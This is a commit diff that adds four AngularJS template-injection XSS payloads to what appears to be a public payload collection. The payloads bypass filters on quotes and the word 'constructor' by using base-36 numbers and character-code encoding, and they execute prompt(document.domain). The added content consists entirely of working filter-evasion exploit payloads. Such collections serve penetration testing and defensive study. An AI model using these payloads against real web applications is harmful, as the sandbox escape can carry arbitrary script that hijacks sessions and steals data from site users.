Merge pull request #482 from khiemtq-cyber/xss/angular-xss-1

[update] Angular XSS payload
2025-01-30 23:25:03 +00:00 · 2022-04-18 21:01:44 +02:00 · 2022-04-18 21:01:44 +02:00 · 85a50869f2
commit 85a50869f2
parent 629f6d6cef 5d898e004f
1 changed files with 17 additions and 0 deletions
--- a/Injection/XSS
+++ b/Injection/XSS
@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter
 {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
 ```

+AngularJS (without `'` single and `"` double quotes and `constructor` string)
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```
+
+```javascript
+{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
+```

 ### Blind XSS